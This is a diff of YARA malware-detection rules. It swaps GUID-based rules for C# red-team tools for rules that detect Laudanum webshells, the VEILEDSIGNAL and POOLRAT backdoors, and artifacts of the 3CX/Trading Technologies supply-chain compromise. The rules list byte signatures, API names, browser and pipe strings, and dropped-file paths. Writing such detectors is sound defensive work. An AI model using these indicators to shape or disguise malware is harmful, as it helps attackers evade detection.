-rule SIGNATURE_BASE_HKTL_NET_GUID_Salsa_Tools : FILE
+rule SIGNATURE_BASE_Laudanum_Tools_Generic : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "50db578e-6ddb-54d1-a978-e3630a3548c3"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/Hackplayers/Salsa-tools"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1393-L1407"
+		description = "Laudanum Injector Tools"
+		author = "Florian Roth (Nextron Systems)"
+		id = "15738788-5f34-54d0-92fe-f7024c998a54"
+		date = "2015-06-22"
+		modified = "2023-12-05"
+		reference = "http://laudanum.inguardians.com/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_laudanum_webshells.yar#L314-L345"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "086108496c5ff6df15a26453da7f0922c29132fd4136cca9a02c21afc9c55ad5"
+		logic_hash = "52c6d3be4fc91e8a61645886fa89bf78eddad51960702ff2ac83ec01d5d529ef"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		super_rule = 1
+		hash0 = "076aa781a004ecb2bf545357fd36dcbafdd68b1a"
+		hash1 = "885e1783b07c73e7d47d3283be303c9719419b92"
+		hash2 = "01d5d16d876c55d77e094ce2b9c237de43b21a16"
+		hash3 = "7421d33e8007c92c8642a36cba7351c7f95a4335"
+		hash4 = "f49291aef9165ee4904d2d8c3cf5a6515ca0794f"
+		hash5 = "c0dee56ee68719d5ec39e773621ffe40b144fda5"
+		hash6 = "f32b9c2cc3a61fa326e9caebce28ef94a7a00c9a"
+		hash7 = "dc5c03a21267d024ef0f5ab96a34e3f6423dfcd6"
+		hash8 = "fd498c8b195967db01f68776ff5e36a06c9dfbfe"
+		hash9 = "b50ae35fcf767466f6ca25984cc008b7629676b8"
+		hash10 = "5570d10244d90ef53b74e2ac287fc657e38200f0"
+		hash11 = "42bcb491a11b4703c125daf1747cf2a40a1b36f3"
+		hash12 = "83e4eaaa2cf6898d7f83ab80158b64b1d48096f4"
+		hash13 = "dec7ea322898690a7f91db9377f035ad7072b8d7"
+		hash14 = "a2272b8a4221c6cc373915f0cc555fe55d65ac4d"
+		hash15 = "588739b9e4ef2dbb0b4cf630b73295d8134cc801"
+		hash16 = "43320dc23fb2ed26b882512e7c0bfdc64e2c1849"
 
 	strings:
-		$typelibguid0lo = "276004bb-5200-4381-843c-934e4c385b66" ascii wide
-		$typelibguid1lo = "cfcbf7b6-1c69-4b1f-8651-6bdb4b55f6b9" ascii wide
+		$s1 = "***  laudanum@secureideas.net" fullword ascii
+		$s2 = "*** Laudanum Project" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		filesize < 60KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Windowsdefender_Payload_Downloader : FILE
+rule SIGNATURE_BASE_APT_MAL_VEILEDSIGNAL_Backdoor_Apr23 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "6e494a91-c05e-5a2e-8aa9-77600f3bdd47"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/notkohlrexo/WindowsDefender-Payload-Downloader"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1409-L1422"
+		description = "Detects malicious VEILEDSIGNAL backdoor"
+		author = "X__Junior"
+		id = "74c403ea-3178-58e8-88b3-a51c1d475868"
+		date = "2023-04-20"
+		modified = "2023-12-05"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L2-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "587784216f3cf47e291219e08dc2b38bd43b11519d612eaccc631539ecc27c60"
-		score = 75
+		logic_hash = "4fe1a1b09344cd84f981b193b480d23807893b59ad781868d82089a7306c042f"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "aa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43"
 
 	strings:
-		$typelibguid0lo = "2f8b4d26-7620-4e11-b296-bc46eba3adfc" ascii wide
+		$op1 = {B8 AB AA AA AA F7 E1 8B C1 C1 EA 02 8D 14 52 03 D2 2B C2 8A 84 05 ?? ?? ?? ?? 30 84 0D ?? ?? ?? ??}
+		$op2 = { 50 66 0F 13 85 ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? 66 0F 13 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 3C 00 00 00 C7 85 ?? ?? ?? ?? 40 00 00 00 C7 85 ?? ?? ?? ?? 05 00 00 00 FF 15}
+		$op3 = { 6A 00 8D 85 ?? ?? ?? ?? 50 6A 04 8D 85 ?? ?? ?? ?? 50 57 FF 15 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Privilege_Escalation : FILE
+rule SIGNATURE_BASE_SUSP_APT_MAL_VEILEDSIGNAL_Backdoor_Apr23
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "28615807-6637-57fc-ba56-efc64b041b80"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/Mrakovic-ORG/Privilege_Escalation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1424-L1437"
+		description = "Detects marker found in VEILEDSIGNAL backdoor"
+		author = "X__Junior"
+		id = "8f0d92b6-d9b0-55e3-b2ca-601d095f5279"
+		date = "2023-04-20"
+		modified = "2023-04-21"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L19-L35"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "18f5d4f917e1e3f0902ab50d6ae2c249782c65d0fc1ed4bc4d06ffae4d286598"
+		logic_hash = "ccb482a7634dc24fde03b5730bf28a9e028f8d5a9ad46ba9663d1b520264d8f4"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
+		hash1 = "aa318070ad1bf90ed459ac34dc5254acc178baff3202d2ea7f49aaf5a055dd43"
 
 	strings:
-		$typelibguid0lo = "ed54b904-5645-4830-8e68-52fd9ecbb2eb" ascii wide
+		$opb1 = { 81 BD ?? ?? ?? ?? 5E DA F3 76}
+		$opb2 = { C7 85 ?? ?? ?? ?? 74 F2 39 DA 66 C7 85 ?? ?? ?? ?? E5 CF}
+		$opb3 = { C7 85 ?? ?? ?? ?? 74 F2 39 DA B9 00 04 00 00 66 C7 85 ?? ?? ?? ?? E5 CF }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		2 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Marauder : FILE
+rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f2783477-2853-5dcd-95f5-9f1e07a4a6e8"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/maraudershell/Marauder"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1439-L1452"
+		description = "Detects VEILEDSIGNAL malware"
+		author = "Mandiant"
+		id = "3e7c92fe-a7bd-5180-9935-4f98f2b64e2b"
+		date = "2023-04-20"
+		modified = "2023-12-05"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L37-L55"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b1a14c6dd80beedd1f385f3b85cec44a443020a76d4da03ea3a53e1c7c0a7b82"
+		logic_hash = "439a201e6a44a00a31fd13efc83a1acf858a52201e3ab48d5cf095bae1e48cf7"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
+		hash1 = "404b09def6054a281b41d309d809a428"
+		hash2 = "c6441c961dcad0fe127514a918eaabd4"
 
 	strings:
-		$typelibguid0lo = "fff0a9a3-dfd4-402b-a251-6046d765ad78" ascii wide
+		$rh1 = { 68 5D 7A D2 2C 3C 14 81 2C 3C 14 81 2C 3C 14 81 77 54 10 80 26 3C 14 81 77 54 17 80 29 3C 14 81 77 54 11 80 AB 3C 14 81 D4 4C 11 80 33 3C 14 81 D4 4C 10 80 22 3C 14 81 D4 4C 17 80 25 3C 14 81 77 54 15 80 27 3C 14 81 2C 3C 15 81 4B 3C 14 81 94 4D 1D 80 28 3C 14 81 94 4D 14 80 2D 3C 14 81 94 4D 16 80 2D 3C 14 81 }
+		$rh2 = { 00 E5 A0 2B 44 84 CE 78 44 84 CE 78 44 84 CE 78 1F EC CA 79 49 84 CE 78 1F EC CD 79 41 84 CE 78 1F EC CB 79 C8 84 CE 78 BC F4 CA 79 4A 84 CE 78 BC F4 CD 79 4D 84 CE 78 BC F4 CB 79 65 84 CE 78 1F EC CF 79 43 84 CE 78 44 84 CF 78 22 84 CE 78 FC F5 C7 79 42 84 CE 78 FC F5 CE 79 45 84 CE 78 FC F5 CC 79 45 84 CE 78}
+		$rh3 = { DA D2 21 22 9E B3 4F 71 9E B3 4F 71 9E B3 4F 71 C5 DB 4C 70 94 B3 4F 71 C5 DB 4A 70 15 B3 4F 71 C5 DB 4B 70 8C B3 4F 71 66 C3 4B 70 8C B3 4F 71 66 C3 4C 70 8F B3 4F 71 C5 DB 49 70 9F B3 4F 71 66 C3 4A 70 B0 B3 4F 71 C5 DB 4E 70 97 B3 4F 71 9E B3 4E 71 F9 B3 4F 71 26 C2 46 70 9F B3 4F 71 26 C2 B0 71 9F B3 4F 71 9E B3 D8 71 9F B3 4F 71 26 C2 4D 70 9F B3 4F 71 }
+		$rh4 = { CB 8A 35 66 8F EB 5B 35 8F EB 5B 35 8F EB 5B 35 D4 83 5F 34 85 EB 5B 35 D4 83 58 34 8A EB 5B 35 D4 83 5E 34 09 EB 5B 35 77 9B 5E 34 92 EB 5B 35 77 9B 5F 34 81 EB 5B 35 77 9B 58 34 86 EB 5B 35 D4 83 5A 34 8C EB 5B 35 8F EB 5A 35 D3 EB 5B 35 37 9A 52 34 8C EB 5B 35 37 9A 58 34 8E EB 5B 35 37 9A 5B 34 8E EB 5B 35 37 9A 59 34 8E EB 5B 35 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 and 1 of ( $rh* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_AV_Evasion_Tool : FILE
+rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_2 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "d4257465-38a0-56b9-8402-b92e21b96cb0"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/1y0n/AV_Evasion_Tool"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1454-L1468"
+		description = "Detects VEILEDSIGNAL malware"
+		author = "Mandiant"
+		id = "1b96c2f0-1c57-593e-9630-a72d43eb857e"
+		date = "2023-04-20"
+		modified = "2023-12-05"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L57-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9962ed855d43e12ecfcb38337e20db714315d0ec9d83f74d115765a973939b5c"
+		logic_hash = "62f74faa8f136f4dc63a4b703cffcb97b438cc4f180d5d127d1fc4b86d3cd1d1"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
+		hash1 = "404b09def6054a281b41d309d809a428"
 
 	strings:
-		$typelibguid0lo = "1937ee16-57d7-4a5f-88f4-024244f19dc6" ascii wide
-		$typelibguid1lo = "7898617d-08d2-4297-adfe-5edd5c1b828b" ascii wide
+		$sb1 = { C1 E0 05 4D 8? [2] 33 D0 45 69 C0 7D 50 BF 12 8B C2 41 FF C2 C1 E8 07 33 D0 8B C2 C1 E0 16 41 81 C0 87 D6 12 00 }
+		$si1 = "CryptBinaryToStringA" fullword
+		$si2 = "BCryptGenerateSymmetricKey" fullword
+		$si3 = "CreateThread" fullword
+		$ss1 = "ChainingModeGCM" wide
+		$ss2 = "__tutma" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Fenrir : FILE
+rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_3 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "cfc6312d-5997-5261-b771-c7f3f30bf86c"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/nccgroup/Fenrir"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1470-L1483"
+		description = "Detects VEILEDSIGNAL malware"
+		author = "Mandiant"
+		id = "82790c65-1d93-509b-95df-841543943c30"
+		date = "2023-04-20"
+		modified = "2023-12-05"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L78-L96"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9b62914aea33db4027c62ecf57854d20942197d1b9212245d1932c0a6b80fe5f"
+		hash = "c6441c961dcad0fe127514a918eaabd4"
+		logic_hash = "2109340edfb1891baef5bd92ba3c9da77f891341de9e8094060a649de62fade2"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
 
 	strings:
-		$typelibguid0lo = "aecec195-f143-4d02-b946-df0e1433bd2e" ascii wide
+		$ss1 = { 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6A 73 6F 6E 2C 20 74 65 78 74 2F 6A 61 76 61 73 63 72 69 70 74 2C 20 2A 2F 2A 3B 20 71 3D 30 2E 30 31 00 00 61 63 63 65 70 74 00 00 65 6E 2D 55 53 2C 65 6E 3B 71 3D 30 2E 39 00 00 61 63 63 65 70 74 2D 6C 61 6E 67 75 61 67 65 00 63 6F 6F 6B 69 65 00 00 }
+		$si1 = "HttpSendRequestW" fullword
+		$si2 = "CreateNamedPipeW" fullword
+		$si3 = "CreateThread" fullword
+		$se1 = "DllGetClassObject" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Stormkitty : FILE
+rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_4 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "09d66661-5b67-5846-9bea-ec682afb62cf"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/LimerBoy/StormKitty"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1485-L1499"
+		description = "Detects VEILEDSIGNAL malware"
+		author = "Mandiant"
+		id = "379e6471-3c4f-5c72-b8fd-17f481e89ac6"
+		date = "2023-04-20"
+		modified = "2023-12-05"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L98-L118"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e346a56a555fe8fae6d5f3704a39b97e82de79160da93cba7646eb7d6a98d5a8"
+		logic_hash = "2a875c39a43ff054ed5a6cf2fa1f17c2adc189452582763db8ceddfa652abfbf"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
+		hash1 = "404b09def6054a281b41d309d809a428"
+		hash2 = "c6441c961dcad0fe127514a918eaabd4"
 
 	strings:
-		$typelibguid0lo = "a16abbb4-985b-4db2-a80c-21268b26c73d" ascii wide
-		$typelibguid1lo = "98075331-1f86-48c8-ae29-29da39a8f98b" ascii wide
+		$sb1 = { FF 15 FC 76 01 00 8B F0 85 C0 74 ?? 8D 50 01 [6-16] FF 15 [4] 48 8B D8 48 85 C0 74 ?? 89 ?? 24 28 44 8B CD 4C 8B C? 48 89 44 24 20 }
+		$sb2 = { 33 D2 33 C9 FF 15 [4] 4C 8B CB 4C 89 74 24 28 4C 8D 05 [2] FF FF 44 89 74 24 20 33 D2 33 C9 FF 15 }
+		$si1 = "CreateThread" fullword
+		$si2 = "MultiByteToWideChar" fullword
+		$si3 = "LocalAlloc" fullword
+		$se1 = "DllGetClassObject" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Crypter_Runtime_AV_S_Bypass : FILE
+rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_5 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "726cd57b-d88a-5854-b2e1-76d9bd71a155"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/netreverse/Crypter-Runtime-AV-s-bypass"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1501-L1514"
+		description = "Detects VEILEDSIGNAL malware"
+		author = "Mandiant"
+		id = "7d0718fc-4f1c-5293-8dc4-81a5783fbfb2"
+		date = "2023-04-20"
+		modified = "2023-12-05"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L120-L143"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4427fdd90b88576b05bc47c0a24a6daa92e066868e3c738007bfcf9c29058b2e"
+		logic_hash = "5d43b8198ad224bee8d290dd7031d73f76a7d957a2e3b44d89e7aaf5f2c94c65"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
+		hash1 = "6727284586ecf528240be21bb6e97f88"
 
 	strings:
-		$typelibguid0lo = "c25e39a9-8215-43aa-96a3-da0e9512ec18" ascii wide
+		$sb1 = { 48 8D 15 [4] 48 8D 4C 24 4C E8 [4] 85 C0 74 ?? 48 8D 15 [4] 48 8D 4C 24 4C E8 [4] 85 C0 74 ?? 48 8D 15 [4] 48 8D 4C 24 4C E8 [4] 85 C0 74 ?? 48 8D [3] 48 8B CB FF 15 [4] EB }
+		$ss1 = "chrome.exe" wide fullword
+		$ss2 = "firefox.exe" wide fullword
+		$ss3 = "msedge.exe" wide fullword
+		$ss4 = "\\\\.\\pipe\\*" ascii fullword
+		$ss5 = "FindFirstFileA" ascii fullword
+		$ss6 = "Process32FirstW" ascii fullword
+		$ss7 = "RtlAdjustPrivilege" ascii fullword
+		$ss8 = "GetCurrentProcess" ascii fullword
+		$ss9 = "NtWaitForSingleObject" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Runasuser : FILE
+rule SIGNATURE_BASE_APT_NK_MAL_M_Hunting_VEILEDSIGNAL_6 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ead7819a-1397-5953-888f-2176e4041375"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/atthacks/RunAsUser"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1516-L1529"
+		description = "Detects VEILEDSIGNAL malware"
+		author = "Mandiant"
+		id = "2cbedbc0-d465-5674-bf9c-9362003eb8d2"
+		date = "2023-04-20"
+		modified = "2023-12-05"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L145-L164"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "8ac64be85ae1a55c3390dace5e43580453568758a712bdca0a5e81817d0a7fb0"
+		logic_hash = "d3b1e5f7a6b73fc4cdc5abe19a412130cde33c2d52c0ad78256b865e018e3794"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
+		hash1 = "00a43d64f9b5187a1e1f922b99b09b77"
 
 	strings:
-		$typelibguid0lo = "9dff282c-93b9-4063-bf8a-b6798371d35a" ascii wide
+		$ss1 = "C:\\Programdata\\" wide
+		$ss2 = "devobj.dll" wide fullword
+		$ss3 = "msvcr100.dll" wide fullword
+		$ss4 = "TpmVscMgrSvr.exe" wide fullword
+		$ss5 = "\\Microsoft\\Windows\\TPM" wide fullword
+		$ss6 = "CreateFileW" ascii fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Hwidbypass : FILE
+rule SIGNATURE_BASE_SUSP_NK_MAL_M_Hunting_POOLRAT
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "62b0541b-6eec-546e-8445-85d25bb0d784"
-		date = "2020-12-13"
-		modified = "2025-08-15"
-		reference = "https://github.com/yunseok/HWIDbypass"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_github_net_redteam_tools_guids.yar#L1531-L1544"
+		description = "Detects strings found in POOLRAT malware"
+		author = "Mandiant"
+		id = "70f5f3a0-0fd0-54dc-97cc-4f3c35f02fcd"
+		date = "2023-04-20"
+		modified = "2023-12-05"
+		old_rule_name = "APT_NK_MAL_M_Hunting_POOLRAT"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L166-L202"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "1b19d3560fdf5bfbfd3c4fb434474cdde5efa42de611fb97e76312664b8cedb7"
-		score = 75
+		logic_hash = "ac8db844a9c4ed961930417809afb706ea948c4509a4be1eaeed77f09c86069d"
+		score = 70
+		quality = 83
+		tags = ""
+		disclaimer = "This rule is meant for hunting and is not tested to run in a production environment"
+		hash1 = "451c23709ecd5a8461ad060f6346930c"
+
+	strings:
+		$s1 = "name=\"uid\"%s%s%u%s" ascii wide
+		$s2 = "name=\"session\"%s%s%u%s" ascii wide
+		$s3 = "name=\"action\"%s%s%s%s" ascii wide
+		$s4 = "name=\"token\"%s%s%u%s" ascii wide
+		$str1 = "--N9dLfqxHNUUw8qaUPqggVTpX-" wide ascii nocase
+
+	condition:
+		any of ( $s* ) or $str1
+}
+rule SIGNATURE_BASE_APT_NK_Tradingtech_Forensicartifacts_Apr23_1 : FILE
+{
+	meta:
+		description = "Detects forensic artifacts, file names and keywords related the Trading Technologies compromise UNC4736"
+		author = "Florian Roth"
+		id = "f79a5321-4f22-52d9-aa83-4aa750ecc036"
+		date = "2023-04-20"
+		modified = "2023-04-21"
+		reference = "https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_nk_tradingtech_apr23.yar#L204-L225"
+		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
+		logic_hash = "50329427e56b70335a12f0dde87a36ac95838377482eebab334d252332fe481b"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "47e08791-d124-4746-bc50-24bd1ee719a6" ascii wide
+		$x1 = "www.tradingtechnologies.com/trading/order-management" ascii wide
+		$xf1 = "X_TRADER_r7.17.90p608.exe" ascii wide
+		$xf2 = "\\X_TRADER-ja.mst" ascii wide
+		$xf3 = "C:\\Programdata\\TPM\\TpmVscMgrSvr.exe" ascii wide
+		$xf4 = "C:\\Programdata\\TPM\\winscard.dll" ascii wide
+		$fp1 = "<html"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		not uint16( 0 ) == 0x5025 and 1 of ( $x* ) and not 1 of ( $fp* )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Xoredreflectivedll : FILE
+
+rule SIGNATURE_BASE_SUSP_TH_APT_UNC4736_Tradingtech_Cert_Apr23_1
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9b584bfb-98ef-50ee-b546-780c4b210a1b"
-		date = "2020-12-13"
